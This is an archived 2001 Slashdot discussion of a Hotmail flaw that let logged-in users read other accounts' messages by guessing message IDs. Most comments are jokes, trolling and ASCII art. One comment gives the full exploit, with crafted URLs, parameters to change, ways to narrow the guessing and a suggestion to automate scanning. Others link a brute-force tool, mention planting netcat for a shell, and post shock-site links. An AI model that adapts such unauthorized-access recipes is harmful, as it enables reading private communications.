Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Hotmail Hacked

CmdrTaco posted more than 12 years ago | from the it-happened-again dept.

Microsoft 494

SyD writes " Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail. A hacking group known as root core discovered the hole and reported it to Microsoft. " This isn't the first time that the folks who are gonna give us a internet wide universal login system had a hole. The funny part is that I posted a story almost exactly like this like 2 years ago, and about once a week, someone emails me and says "I think my boyfriend/girlfriend is cheating on me and I really need to know the backdoor into hotmail to find out". No I'm not kidding. You can't make that stuff up.

cancel ×

494 comments

Sorry! There are no comments related to the filter you selected.

Yes you can (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199796)

CmdrTaco, you can make ANYTHING up. You've often shown your quite good at it, too. When's that Linux domination thing taking place, again?

Step-by-step hacking tutorial (4, Offtopic)

cyberformer (257332) | more than 12 years ago | (#2199864)

The Register [theregister.co.uk] has a nice guide that explains exactly how you can exploit the hack. [theregister.co.uk]


For script kiddies who don't want to be bothered with the detailes, there's even a Windows program [can-host.com] that automates the process.

hmmm (0, Troll)

niekze (96793) | more than 12 years ago | (#2199798)

Isn't this *after* they started moving a lot of servers to windoze from FreeBSD

Yes, probably flame bait...it's in the hostmail system...so no blame on the OS :)

Oh no! (1, Funny)

Mr. Sketch (111112) | more than 12 years ago | (#2199803)

Now someone ELSE will have to read all my spam too, oh darn. They'd better fix that quick.

Re:Oh no! (1)

jesser (77961) | more than 12 years ago | (#2199827)

I was going to post a similar comment, using the exact same subject. You're too fast.

Re:Oh no! (0)

Anonymous Coward | more than 12 years ago | (#2199844)

I love T1, T1 loves me. We're a hap-py fam-i-ly...

Again? (3, Funny)

SilLumTao (134743) | more than 12 years ago | (#2199808)

Apparently there is a major security hole on Hotmail that could allow crackers to read your e-mail.


Score: -1, Redundant

No Kidding... (0, Redundant)

Greyfox (87712) | more than 12 years ago | (#2199931)

I was all set to flame about this story being a year old. Oops. It's a different one. Sorry. My bad.

First Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199810)

yeah more more more Alyson Hannigan.

That hot grits scene on buffy last week caused me to pop my cork!

Re:First Alyson Hannigan post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199863)

She was on Stern last week. Sounded wicked hot. (Yes, I'm from MA. Wicked pissah.)

and this is news? (1, Insightful)

Anonymous Coward | more than 12 years ago | (#2199812)

c'mon this isn't news this is just a reality of MS and the everyday world.

Ohh and don't blame the OS blame the programmers

Re:and this is news? (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199839)

In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said.

Riight, odds of that are what? Take a given hotmail account, and then guess which couple hundred message IDs out of 10 billion correspond to something in their mailbox. Fuck you taco, that's not a security hole, this [goatse.cx] is a security hole.

Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199814)

iiiiiiiiiiiiiiiiiiiiiiiiii8888ii8888888
iiiiiiiiiiiiiiiiiii888888888888888888888888
iiiiiiiiiiiiiiii8888iii8888888888888888888888888
iiiiiiiiiiiiii8888iiiiii888888888888888888888888 88 88
iiiiiiiiiiiii88iiiiiiii888iii8888888888888888888 88 8888
iiiiiiiiiii88888888iiii8iiiiiiiiiii8888888888888 88 88888
iiiiiiiii888i8ii888888iiiiiiiiiiiiiiiiii88888888 88 8iii888
iiiiiiiiiiii88iiii88888888iiiimiiiiiiiiii8888888 88 88iiii8
iiiiiiiiii888888888888888888iMiiiiiiiiiii8888888 88 8888
iiiiiiiii88888888888888888888iiiiiiiiiiiiM888888 88 888888
iiiiiiiii8888888888888888888888iiiiiiiiiM8888888 88 8888888
iiiiiiiiii8888888888888888888888iiiiiiiM88888888 88 88888888
iiiiiiiii8888888888888888ii88888iiiiiiM888888888 88 888888888
iiiiiii88888888888888888iii88888iiiiiM8888888888 88 888iii8888
iiiiii88888888888888888iii88888iiiiMii;o*M*o;888 88 8888iiii88
iiiii88888888888888888iii8888iiiiiMiiiiiiiiiii88 88 8888iiii8
iiii88888888888888888iiii88iiiiiiMi;iiiiiiiiiii8 88 888888
iii8888888888888888888iii8iiiiiiMiiaAaiiiiiiiiM8 88 8888888iiiiiii8
iii88iii8888888888ii88iiii8iiiiMiiiiiiiiiiiii888 88 8888888888i8888
ii88ii88888888888iii8iiiiiiiiiMiiiiiiiiii;ii88i8 88 88888888888888
ii8ii8888888888888iiiiiiiiiiiMii"@@@@@@@"iiii8w8 88 8888888888888
iii88888888888i888iiiiiiiiiiMiiiii"@a@"iiiiiM8i8 88 888888888888
ii8888888888iiii88iiiiiiiiiM88iiiiiiiiiiiiiM88z8 88 88888888888888
i8888888888iiiii8iiiiiiiiiM88888iiiiiiiiiMM888!8 88 888888888888888
i888888888iiiii8iiiiiiiiiM8888888MAmmmAMVMM888*8 88 88888iii88888888
i888888iMiiiiiiiiiiiiiiiM888888888iiiiiiiMM88888 88 8888888iii8888888
i8888iiiMiiiiiiiiiiiiiiM88888888888iiiiiiMM88888 88 88888888iiii88888
ii888iiiMiiiiiiiiiiiiiM8888888888888MiiiiimM8888 88 888888888iiii8888
iii888iiMiiiiiiiiiiiiM8888i888888888888iiiimiiMm 88 888i888888iii8888
iiii88iiMiiiiiiiiiiii8888i88888888888888888iiiii iM m8iii88888iii888
iiii88iiMiiiiiiiiii8888Mii88888ii888888888888iii ii iiMm88888iiii88
iiii8iiiMMiiiiiiii8888Miii8888iiiii888888888888i ii iiiiiMm8iiiii4
iiiiiiii8Miiiiiii8888Miiiii888iiiiiii88iii888888 8i iiiiiiiMmiiii2
iiiiiii88MMiiiii8888Miiiiiii88iiiiiiii8iiiii8888 88 iiiMiiiiiM
iiiiii8888Miiiii888MMiiiiiiii8iiiiiiiiiiiMiiii88 88 iiiiMiiiiM
iiiii88888Miiiii88iMiiiiiiiiii8iiiiiiiiiiiMiii88 88 iiiiiiMiiM
iiii88i888MMiii888iMiiiiiiiiiiiiiiiiiiiiiiiMi888 8i iiiiiiiiMi
iiii8i88888Miii88iiMiiiiiiiiiiiiiiiiiiiiiiiMMi88 ii iiiiiiiiiiM
iiiiii88888Miii88iiMiiiiiiiiii*88*iiiiiiiiiiMi88 ii iiiiiiiiiiiiM
iiiii888888Miii88iiMiiiiiiiii88@@88iiiiiiiiiMii8 8i iiiiiiiiiiiiiM
iiiii888888MMii88iiMMiiiiiiii88@@88iiiiiiiiiMiii 8i iiiiiiiiiiiii*8
iiiii88888iiMiii8iiMMiiiiiiiii*88*iiiiiiiiiiMiii ii iiiiiiiiiiii88@@
iiiii8888iiiMMiiiiiiMMiiiiiiiiiiiiiiiiiiiiiMMiii ii iiiiiiiiiiii88@@
iiiiii888iiiiMiiiiiiiMMiiiiiiiiiiiiiiiiiiiMMiiMi ii iiiiiiiiiiiii*8
iiiiii888iiiiMMiiiiiiiMMMiiiiiiiiiiiiiiiiMMiiiMM ii iiiiiiiiiiiiiM
iiiiiii88iiiiiMiiiiiiiiMMMMiiiiiiiiiiiMMMMiiiiiM Mi iiiiiiiiiiiMM
iiiiiiii88iiiiMMiiiiiiiiiMMMMMMMMMMMMMMMiiiiiiii MM MiiiiiiiiMMM
iiiiiiiii88iiiiMMiiiiiiiiiiiiMMMMMMMiiiiiiiiiiii ii MMMMMMMMMM
iiiiiiiiii88iii8MMiiiiiiiiiiiiiiiiiiiiiiiiiiiiii ii iiMMMMMM
iiiiiiiiiii8iii88MMiiiiiiiiiiiiiiiiiiiiiiMiiiMii ii iiiiMM
iiiiiiiiiiiiiii888MMiiiiiiiiiiiiiiiiiiMMiiiiiiMM ii iiiiMM
iiiiiiiiiiiiii88888MMiiiiiiiiiiiiiiiMMMiiiiiiimM ii iiiMM

Re:Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199832)

Where did you get that GIF to text converter and that picture of alison hannigan?

If you tilt down you'll see the hot grits...

Re:Hotfemail (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199853)

http://www.goatse.cx/porn_for_lynx.html

JK (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199815)

JonKatz is responsable for this. Let's kill him now.

Slashdot requires you to wait 20 seconds between hitting 'reply' and submitting a comment.

It's been 13 seconds since you hit 'reply'!

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

Browser type
User ID/Nickname or AC
What steps caused this error
Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
How many posts to this form you successfully submitted during the day* Please choose 'formkeys' for the category!
Thank you.

Uhhhh no.

More info (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199817)

More info on MSN UK [msn.co.uk]

Re:More info (-1, Troll)

Anonymous Coward | more than 12 years ago | (#2199911)

Heh, the people at Netscape are loving this. You can see them gloating in this article [netscape.com] .

220000th post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199819)

in yer face!

Re:220000th post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199851)

YOU SUCK!

read it and weep, you idiot.

The MPAA ROCKS! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199820)

copyright violations [mpaa.org] are killing the industry. Its time you all stood up and said no to decss and yes to the FITA treaty to protect copyright holders. After all as long as you don't steal then your not affected. Its not lke you can watch your dvd's on your linux box or anything.

here's the instructions how to do it (1, Informative)

gol64738 (225528) | more than 12 years ago | (#2199821)

---=[ Three Steps To View Someones Emails In Hotmail (rev.2) ]=---

(Tested with Internet Explorer 5)

To view full email from some elses account do the following:

1. Login normally to Hotmail with your ID (any id)

2. Use this type of link to view specific message from specific user:

http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d1%26len%3d9999999999999999%26raw%3d0% 26login%3dusername%26domain%3dhotmail%2ecom&hm___f l=attrd&domain=hotmail.com
or
http://lw14fd.law14.hotmail.msn.com/cgi-bin/saferd ?_lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2 fcgi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250% 2e22%26start%3d1%26len%3d9999999999999999%26raw%3d 0%26login%3dusername%26domain%3dhotmail%2ecom&hm__ _fl=attrd&domain=hotmail.com

From that link change values:
MSG943322803%2e16 (Message id number, its simply a counter. %2e is escaped code for ".")
username (Hotmail account name to view)

MSG number examples: MSG943322803%2e1 , MSG943322803%2e22 , MSG943322803%2e149

(remove "%26raw%3d0" if you want to view email as 'emailbox view', instead of full raw view.)
(remove "&hm___fl=attrd&domain=hotmail.com" if you dont like the hotmail frame on top.)

Note.You need to have both numbers correct
and that username must have the message to make this link work.

Note.All those "%2e" etc. are hexadecimal ascii codes. You need to use them instead of true characters.
See here for full list: http://www.december.com/html/spec/ascii.html

3. Done. If you entered correct message number & that user has it you will see it. :)
(Test it with your own other hotmail account messages first to get the idea working.)

---=[ ideas and comments for improved viewing / scan ]=---

Now typing those message numbers manually is too much
work, you could create a small utility to automatically
scan given range of messages from specific user name.
(You need to build it to work with IE, as you must be
logged in hotmail when you want to view messages..)

It also helps to know that from the message numbers,
in you own hotmail inbox,you can see about what time
is what message number been used. eg:

MSG998289581.0 arrived on 20.08.2001
MSG997936971.27 arrived on 16.08.2001.
MSG996698372.27 arrived on 01.08.2001.
MSG975960863.0 arrived on 04.12.2000.

So you dont need to scan as many message addresses
when you know from which range you are looking at.

Test messages: (Login to hotmail,then use links to view message from my test account)

raw format view: (can copy base64 encoded files too:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26raw%3d0%26disk%3d 64%2e4%2e36%2e68_d1577%26login%3djokutesti99%26dom ain%3dhotmail%2ecom&hm___fl=attrd&domain=hotmail.c om

email box view: (can see any attached images directly etc.:)
http://pv2fd.pav2.hotmail.msn.com/cgi-bin/saferd ?_ lang=EN&hm___tg=http%3a%2f%2f64%2e4%2e36%2e250%2fc gi%2dbin%2fgetmsg&hm___qs=%26msg%3dMSG998047250%2e 22%26start%3d9702%26len%3d9687%26disk%3d64%2e4%2e3 6%2e68_d1577%26login%3djokutesti99%26domain%3dhotm ail%2ecom&hm___fl=attrd&domain=hotmail.com

*Side note on deleting messages in Hotmail:
-You can also see the message even if its deleted!
If you delete a message in hotmail, and
also empty trashcan, the message is still
viewable using this type of link.
Atleast for 6-12hrs or something.

---=[.... Status / Feedback / Fixes / Questions .....]---

Changes on the link:

Remove parameter:
%26disk%3d64%2e4%2e36%2e68_d1577
It caused Hotmail error page in some cases:
"Due to an internal error your request cannot be processed.
We apologize for the inconvenience. Please try again later."
Solution:
Remove that parameter from the link. its not required.

Changed parameters:
%26start%3d9702%26len%3d9687
in to:
%26start%3d1%26len%3d9999999999999999

Thats is just the start & length to display, of the email.
If you put too small value for len it should display
only up to that amount of characters(?).

*
If the user doesnt have the message you will get error:
"
Subject: Unable to locate message
Content-Type: text/plain; charset=us-ascii
An error has prevented from locating the message."

*
Questions:
Q1. How do i get to know which message number the user has?

A1. You cannot. You just have to guess them..one by one.
Yes, it could mean scanning thousands/millions of
messages just to see something. (slow it is)

Q2. I've sended a test message to my another account but cannot see it?
And i can still see your test messages, but not my own?

A2. Check again that your MSG number is correct, both X and Y. (MSGXXXXXXXXX.YYY)
The Y value can be between 0-nnn. (i havent seen bigger than 150)
Check that the link is correct.
Check that you are logged in to Hotmail.
Also try change the server, from "pv2fd.pav2.hotmail" to "lw14fd.law14.hotmail"
If you can see the test account messages then hotmail hasnt been fixed yet.

Q3. The hobo scanner program doesnt work?
I get some "Path not found (76)" error?

A3. True in most cases.. :)
It has more bugs than microsoft products i guess.
Its confirmed that it works atleast on win95. (latest version is hobo rev.2)
On Winnt it works but it doesnt save the scans..(bug in activating the webwindow..)
Create the output directory yourself, that fixes the path error.

Q4. Where/How can i find this exploit link myself?

A4. 1. Go to your hotmail preferences page.
2. Go to Mail Display Settings.
3. Set option 'Message Headers' to 'Advanced'.
4. Press ok to save settings.
5. View some email, you will see full message header.
6. Click 'View E-mail Message Source'.
7. Done. It opens new window with this exploitable link,
you can remove the some useless parameters from the
link and send this link to a friend for testing
if can see your message.

*
No any reply or confirmation from Hotmail so far.
The exploit still works. already almost 3 days since
reported it to Hotmail..(today is 20.08.2001)

Automated reply from hotmail security problem
submission page did gave this type of message..:p

"...Hotmail is a secure site and uses an intrusion alert that allows only one IP
address to gain access to a mailbox at a time. If anyone tries to access your
e-mail when your account is open, he or she is returned to the sign-in page.
Hotmail uses state-of-the-art software and firewall protection to offer our
members the highest security...."

Re:here's the instructions how to do it (2, Interesting)

Visionized (465361) | more than 12 years ago | (#2199865)

Ya know, it you could some how get that posted out somewhere that has greater volumes of general everyday traffic, maybe the rest of the public would start to get the hint at how bad MS is with security issues.

What would be really interesting is to show an example hacking the rest of the sites that use Passport type technology. This would definitely blow holes in MSs idea of being the "gatekeeper".

Our better yet, it might just close the gate!! :)

Cal

Re:here's the instructions how to do it (1)

haz-mat (8531) | more than 12 years ago | (#2199961)

where is this root core website anyway?

Slashdot Hacked! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199822)

goatse.cx writes " Apparently there is are major security holes in Slash 2.2 that could allow trolls to post goatse.cx links. A hacking group known as 10gramspoppylatex discovered the hole and reported it to CmdrTaco. "

FUCK YOU TACO, FIX YOUR OWN FUCKED UP CODE BEFORE YOU WAG YOUR FINGER AT EVERYONE ELSE IN THE WORLD.

Now if they could only figure out google's cache (0, Offtopic)

moogla (118134) | more than 12 years ago | (#2199828)

I could open internal links on a dead site using google's cache. What is that field next to the URL anyway?

Re:Now if they could only figure out google's cach (1)

HP LoveJet (8592) | more than 12 years ago | (#2199927)

I think it's only for Google's tracking purposes. If you eliminate the alphanumeric code and one of the colons on either side--leaving only
http://www.google.com/search?q=cache:www.foo .com/c ached.url
--it still works fine.

Slash bug? (-1, Offtopic)

Mr. Sketch (111112) | more than 12 years ago | (#2199829)

There were two comments here when I posted my previous message, and now they're gone, even at -1 and my comment is the only one there. What happened to them? There was one at +1 and it wasn't off topic or anything and it's gone. Has anyone else seen this problem?

Average person? (5, Funny)

Chagrin (128939) | more than 12 years ago | (#2199830)


  • "The average person in the street doesn't need to worry, as they would have to be specifically targeted," said Graham Cluley, an Internet security expert with antivirus firm Sophos.

I suppose the quux is whether I'm an "average person" or not. I think I'll go stand in the street to hedge my bets.

All I can say is this: (2)

Apuleius (6901) | more than 12 years ago | (#2199831)

*whew* Good thing I still have all those y2k
supplies.

No no no (2, Interesting)

sllort (442574) | more than 12 years ago | (#2199835)

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Bring me these experts. If someone thinks my hotmail account(s) leave a clear trail to me, they're insane. They leave a clear trail to my web proxy, perhaps. Most of my accounts only ever receive one email too... "Slashdot password for user Vladinat0r"

Sigh. Experts indeed!

The Registers Have Similar Article (1, Redundant)

robbyjo (315601) | more than 12 years ago | (#2199836)

here [theregister.co.uk]

Link to the hack (1)

Troed (102527) | more than 12 years ago | (#2199837)

Correct link [can-host.com] to the hack-description


(Yeah I got that one rejected when I submitted it ... as usual :)

It's not quite so bad (4, Informative)

Imperator (17614) | more than 12 years ago | (#2199838)

You need to guess the message ID, a longish string based on a timestamp and another number. And once you do that, you still can't read other messages from that account unless you guess them separately. You could try brute-forcing the message IDs, of course, but then you're relying on a fast connection (I believe there are 60 possible message IDs per second, and you rarely know exactly when a message was processed anyway) and fast servers. Besides, after all this, you'll probably find that all the target account's real mail was automatically deleted to make room for WinXP.iso.bat, attached to a message asking for advice.

Re:It's not quite so bad (4, Insightful)

MaxwellStreet (148915) | more than 12 years ago | (#2199944)

Exactly.

This isn't the "major" security hole that the slashdot submission suggested.

It would take a minor miracle to guess a message number correctly.

And considering what *I* use hotmail for, namely, a spam catcher, any hacker that got lucky enough would probably discover yet another way to get rich quick. If someone really wanted to read my email there, they could keep trying - but their hotmail username (at very least) would be recorded.

I don't mean to pooh-pooh this issue; but I think editorializing this into a *major* security problem (a la Code Red) is a little disingenuous, and misguided.

Here's rootcore's info (1)

Zen (8377) | more than 12 years ago | (#2199840)

Here [can-host.com] is the release from rootcore, and here [can-host.com] is their exploit. Since the post is low on technical details, here goes. It's pretty simple. Messages are specified by a number. This program guesses the number.

big whooop (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199841)

hotmail is not secure.

fuckers.

so what else is new? (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199842)

old fucking news chumps...

220000th btw...

From my understanding of things... (1)

Digitalia (127982) | more than 12 years ago | (#2199843)

It isn't Passport which is flawed but the system of Hotmail itself. This is merely an exploitation of bad data structure that is independent from Passport. That said, if you care about the security of your private communications, don't use Hotmail. Duh?

The details of the hole... (5, Funny)

kcbrown (7426) | more than 12 years ago | (#2199845)


% telnet www.hotmail.com 80
Trying 64.4.43.7...
Connected to 64.4.43.7.
Escape character is '^]'.
GET /root.exe
What is thy bidding, my master?


Guess they haven't gotten rid of Code Red yet! :-)

(For the humor impaired: no, I did not actually do the telnet session.)

Re:The details of the hole... (1)

Emugamer (143719) | more than 12 years ago | (#2199953)

20 seconds later all of hotmail is down..... coincidence? I think not... beware of user friendly police on their way to your door

dumbass (-1, Flamebait)

Anonymous Coward | more than 12 years ago | (#2199956)

If you've ever read the story or even tested code red you would know that IIS runs as a guest account with limited permissions. So you upload nc.exe and start a telnet session on some port. You can't grab the contents of the sam file or install any more backdoors.

Oh no (4, Insightful)

interstellar_donkey (200782) | more than 12 years ago | (#2199846)

Now anyone can get in and read all the porn ads I get in my hotmail inbox.

Who to blame (1)

madiab (170896) | more than 12 years ago | (#2199847)

So another bug found, my question is, why is the whole world afraid of hackers and crackers (don't even bother to argue the difference) I think that they shouldn't be afraid of the ones telling the bugs but the ones that makes them... See no evil, hear no evil, talk no evil....

One nice thing (2)

rjamestaylor (117847) | more than 12 years ago | (#2199849)

Hotmail is predictable. Down, insecure, loses messages. You can count on it to fail you. I've been using Hotmail for a few years now and cannot remember a time when it was as bad as it is now! Slow, lost Body portions of the messages...cannot connect...

I'm glad for Onebox and my regular email accounts.

Sure, some would say, "It's free; shut up!" But: MS is __still__ claiming to provide a service even though there is no direct cost to me. That there's no cost doesn't mean I don't expect the service to be useable. My recourse is to leave. Is that what MS wants?

Oh, as an aside, I hope the message #292192399 bug is never fixed - "Imagine if there's no First Posts...It's easy if you try..."

Re:One nice thing (1)

jallen02 (124384) | more than 12 years ago | (#2199965)

I kind of like it with the messages numbered in the millions. :)

hotmail sucks! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199852)

220000th in yer face.

Re:hotmail sucks! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199883)

#2199852>> 220000th in yer face.

Ouch...face plants are so painful!

Why is MS reaping the benifits of OSS security? (4, Insightful)

Bonker (243350) | more than 12 years ago | (#2199854)

A monopoly is a scary thing.

Despite the fact that MS beleives very firmly in a security through obscurity model of business, they have both benevolent and malcious hackers and crackers world wide working to expose as many of their security holes as possible, thereby forcing MS to patch those holes. Code Red would still be unpatched if eEye hadn't released it's exploit POC. This exploit would still be out in the open and freely abuseable if it hadn't been released.

Since MS is the 'standard' for most internet users, it's also the recipient of all the world's security unsolicited security advice.

Re:Why is MS reaping the benifits of OSS security? (0)

Anonymous Coward | more than 12 years ago | (#2199926)

Actually code red was based on another worm, and the exploit released was not eEye's either. They did however release an advisory which gave people some heads up. But saying code red would be unpatched.....pull your head out of your ass.

Use yahoo mail... (0)

Anonymous Coward | more than 12 years ago | (#2199855)

Not a single security flaw yet discovered that allows unauthorized email access, and it's been running for 4+ years.

220000th! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199857)

220000th post! read it and weep!

Grimace, McDonalds character, dead at 13 (-1, Insightful)

Anonymous Coward | more than 12 years ago | (#2199859)

I just heard sad news on talk radio -McDonalds commercial star/character Grimace was found dead in his McDonalds house this morning. I'm sure we'll all miss him - even if you didn't eat his food you've probably enjoyed one of his pornographic movies. Truly a purple American homosexual.

Related Link [mcdonalds.com]

Go with Yahoo! Mail. (2, Informative)

boinger (4618) | more than 12 years ago | (#2199861)

Yahoo! Mail [slashdot.org] has never had such a flaw exposed, has it?

And Yahoo! Messenger kicks AIM's and MSN Messenger's asses.

Why tempt fate?

Re:Go with Yahoo! Mail. (1)

boinger (4618) | more than 12 years ago | (#2199880)

Whoops.
Yahoo! Mail [yahoo.com] - forgot that damn http:// :)

220000 alyson hannigans (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199862)

drool...

think of all the grits, enough to fill a large city...

We've tracked the intruder! (1)

sgt_getraer (448034) | more than 12 years ago | (#2199869)

"In addition, intruders would first need to log in to their own Hotmail accounts, which means they'd leave a clear trail for investigators to follow, experts said."

Ah yes, that clear trail to a dead end makes me feel much more secure...

hot males! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199870)

220000th slut!

take that!

previous incident.... (1)

jeffy124 (453342) | more than 12 years ago | (#2199871)

The previous case from 2 years ago Taco speaks of can be found here [slashdot.org]

Re:previous incident (0)

Anonymous Coward | more than 12 years ago | (#2199908)

it's in the Hall of Fame [slashdot.org] !

oh ya baby! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199872)

2200000th post! you know you want it!

Big Surprise - More info... (4, Informative)

tre (172905) | more than 12 years ago | (#2199874)

blah blah, we expect this from MS... blah blah, when will they get their act together...

This was already posted to BugTraq [securityfocus.com] not too long ago. For a more technical breakdown of the details surrounding the Hotmail vulnerability, go here:

http://www.securityfocus.com/archive/1/205785 [securityfocus.com]

PLEASE! (2, Funny)

plemeljr (250971) | more than 12 years ago | (#2199876)

* Will someone please think of the children! *

yo yo yo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199877)

2200000th post!

read it and weep.

Re:yo yo yo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199892)

STUPID

YOU

ARE

Invalid form key: ru1VqvJlny !

If you this error seems to be incorrect, please provide the following in your report to Source Forge:

* Browser type
* User ID/Nickname or AC
* What steps caused this error
* Whether or not you know your ISP to be using a proxy or some sort of service that gives you an IP that others are using simultaneously.
* How many posts to this form you successfully submitted during the day

* Please choose 'formkeys' for the category!
Thank you.

Microsoft's response... (5, Funny)

ddstreet (49825) | more than 12 years ago | (#2199879)

...is priceless:


"However," Microsoft said, "we recognize the concerns raised in the computational infeasibility of this mechanism and are investigating ways that we can raise this bar even higher."


Like Taco said...you just can't make this stuff up. That response is just too funny.

foo (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199885)

bar

muahahahhah (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199887)

220000th post is all mine!

universal variables (2, Interesting)

Traicovn (226034) | more than 12 years ago | (#2199888)

The more parts of a program you have refferencing any single variable in programming C/C++, the more chance for a margin of error you have

Security works the same way. The more places you use a key, or the more people you give a copy of your key to, the higher risk you have for errors, being hacked, identiy theft, being robbed, etc. A 'single sign-on' like the MSN/Hotmail passport or AOL's new Single-Signon or Screenname (not sure what they are calling it) that all AIM accounts/AOL accounts now have become are just another invitation of risk.

Users need to be alerted of this fact, that these systems may not be secure, and users need to understand that the more people who they use their single sign-on for, the higher the risk becomes.

In this situation though, you have to wonder. If the person issuing the 'keys', microsoft in this case, does not do a good job of protecting them and making sure that their security is up to date, can it be any better than if you had a safe deposit box that sat unlocked in the middle of Times Square?

I can't wait to see what happens when in addition to all these Single Sign-on and Passport type programs, that we have Digital Signatures too. That should be interesting.

follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199890)

.,cdSSSSSSSbec.
,eSSSSSSSSSSSSSSSSSbc
,eSSP"" "3SSSS"" "??Sc
.dS" .SSSS "?c
eSSF .,ceSSSSSSSSSSecc,. Sb.
.dSSSSSSP""""""?SSSSSSP????SSe..SSb.
.SSSSSSF,="""""""^SSSS"====,,`"SSSSSS.
.SSSSSSS eSSSSSSSS SSSP.eSSbe."=`SSSSSS
zSSSSSSSS<SSF "SSS.SSS SP"`?SSSe.SSSSSSb zSSb. ..
dSSSSSSSSSc"Sb__zSP'dSSSb" .SSSF,SSSSSSSc .SSSSS.SSSc
dSSSSSSSSSSSSe,`"`,eSSSSSSSc,,`",,eSSSSSSSSS .SSSe,?SSSSFSSSS b.
.SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSb 4SSSSSc"SSSSSSSS%SS.
.SSSSSSSSSP"eSSSSSSSSSS?????SSSSSSSSSSPSSSSSSSS. 4SSSSSSedSSSSSSSSSSP
dSSSSSSSEzebd""????"" `"?SSSSSSF"?SSSSSSS. SSSSSSSSSSSSSSSSSS%
zSSSSSSSSSSSSSSe. `""" .zee3SSSSSSS `SSSSSSSSSSSSSSSSSr
SSSSSSSSSSSSSSSSSSc. ;:;:,,;;;; zSSSSSSSSSSSSSb JSSSSSSSSSSSSSSSSF
SSSSSSSSSSSSSSSSSSSSSbc,""''"",cceSSSSSSSSSSSSSS SSSc SSSSSSSSSSSSSSSSS
SSSSSSSSSSSSSSSSSP"??SSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSc .,SSSSSSSSSSSSSSSS"
SSSSSSSSSSSSSSP".dSSb`SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSS.?SSSSSSSSSSSSSSSS"
SSSSSSSSSP???"zSSSSSP.SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSS.SSSSSSSSSSSSSS?L
SSSSSSSS'dSb,SSSSSF'zSSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSb SSSSSSSSSSSSbS%
SSSSSSS'SSSdSSSSS,,??SSSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSe"SSSSSSSSSSSS"
SSSSSS'SSSSSSSSSSSSSc"SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSc"SSSSSSSSSP"
SSSSS'JSSSSSSSSSSSSSS>SSSSSSSSSSSSSSSSSSSSSSSSSS SSSSSSSSSc3SSSS SSP"

Re:follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199906)

You've done it now, you fucker. McDonalds are going to come down on Trademark infringement like you won't believe...

Re:follow up to the Grimace death post (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199932)

good, maybe i'll countersue and get a free ShitMac out of it.

oh yes! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199895)

what number is this?

2200000th?

oh yes i think so!

220000th post~ (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199897)

two hundred and twenty thousandth post! what wehat what!

i got the post! (-1, Offtopic)

Anonymous Coward | more than 12 years ago | (#2199901)

i got 220000th post. you don't. haha.

Finding a specific message not easy (1, Informative)

Anonymous Coward | more than 12 years ago | (#2199904)

Finding a valid message number is of course total guesswork, but they do all follow a consistent format and always have the same number of digits (i.e., a time stamp), so with the help of a little brute-force program one could (if one was into these things) try numerous combinations in the background rather than type them in.

So the hacking danger here is very much limited by the need to guess message numbers, which is slow going. And while there is a handy program for bruting the numbers it's quite slow, trying only about one message page per second in 'fast' mode.

Theres a little story about it on the msn.co.uk [msn.co.uk] website

